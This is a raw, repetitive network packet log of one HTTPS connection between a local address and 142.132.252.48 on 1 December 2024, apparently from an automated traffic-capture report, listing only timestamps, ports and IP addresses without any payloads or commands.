                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.375144958 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.375329971 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.375329971 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.375341892 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.375402927 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.383373022 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.383390903 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.383460999 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.383469105 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.383502960 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.389578104 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.389594078 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.389638901 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.389647961 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.389708042 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.395503044 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.395519972 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.395584106 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.395591974 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.395941973 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.400950909 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.400965929 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.401015997 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.401021957 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.401084900 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.405908108 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.405929089 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.405963898 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.405973911 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.405997992 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.406013966 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.411524057 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.411539078 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.411592007 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.411598921 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.411653996 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.417320967 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.417335987 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.417395115 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.417402029 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.417465925 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.481266975 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.604334116 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.604360104 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.604408979 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.604418993 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.604443073 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.604454994 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.606089115 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.606105089 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.606146097 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.606153011 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.606177092 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.606199026 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.609664917 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.609682083 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.609719038 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.609725952 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.609817982 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.610621929 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.615281105 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.615297079 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.615380049 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.615387917 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.615422010 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.620651007 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.620667934 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.620721102 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.620738029 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.620879889 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.626301050 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.626317978 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.626362085 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.626375914 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.626389027 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.626416922 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.631294012 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.631309986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.631361008 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.631369114 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.631396055 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.631413937 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.637104988 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.637123108 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.637172937 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.637180090 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.637250900 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.647247076 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.799781084 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.799804926 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.799990892 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.799999952 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.800043106 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.805555105 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.805573940 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.805629969 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.805636883 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.805685997 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.807519913 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.811197042 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.811222076 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.811254978 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.811260939 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.811289072 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.811302900 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.816174030 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.816195965 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.816247940 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.816255093 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.816299915 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.820029974 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.822333097 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.822355986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.822390079 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.822402000 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.822416067 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.822441101 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.827147961 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.827173948 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.827215910 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.827239037 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.827255011 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.827277899 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.832838058 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.832865000 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.832969904 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.832993984 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.834839106 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.838434935 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.838470936 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.838511944 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.838536024 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.838552952 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.838570118 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.864957094 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.002360106 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.002388954 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.002429008 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.002438068 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.002496004 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.008044004 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.008069992 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.008112907 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.008120060 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.008171082 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.013031006 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.013056993 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.013087988 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.013093948 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.013123989 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.013139009 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.018765926 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.018794060 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.018829107 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.018836975 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.018866062 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.018883944 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.024485111 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.024508953 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.024552107 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.024558067 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.024604082 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.024604082 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.029759884 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.029789925 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.029831886 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.029836893 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.029864073 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.029880047 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.031811953 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.035439014 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.035466909 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.035501957 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.035507917 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.035537958 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.035547018 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.040481091 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.040507078 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.040543079 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.040549040 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.040575981 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.040591955 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.069518089 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.204302073 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.204329014 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.204405069 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.204412937 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.204453945 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.209980965 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.210006952 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.210045099 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.210052013 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.210093021 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.210110903 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.215107918 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.215130091 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.215192080 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.215202093 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.216587067 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.220465899 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.220485926 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.220542908 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.220551014 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.220654011 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.226203918 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.226223946 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.226264000 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.226273060 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.226308107 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.231702089 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.231719971 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.231775045 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.231801033 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.231853962 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.237560034 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.237577915 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.237613916 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.237622023 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.237646103 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.237659931 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.242484093 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.242506027 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.242559910 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.242578030 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.242594957 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.242609978 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.405484915 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.405508041 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.405657053 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.405668974 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.405710936 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.411140919 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.411158085 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.411231995 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.411242962 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.411274910 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.416147947 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.416165113 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.416237116 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.416246891 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.416285038 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.421859980 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.421875954 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.421961069 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.421969891 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.422012091 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.427443981 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.427463055 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.427530050 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.427541018 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.427581072 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.433317900 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.433335066 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.433404922 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.433420897 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.433464050 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.438790083 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.438806057 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.438877106 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.438884020 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.438926935 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.443522930 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.443538904 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.443600893 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.443607092 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.443641901 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.606717110 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.606739044 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.606858969 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.606867075 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.607014894 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:51.612385988 CET44349721142.132.252.48192.168.2.6
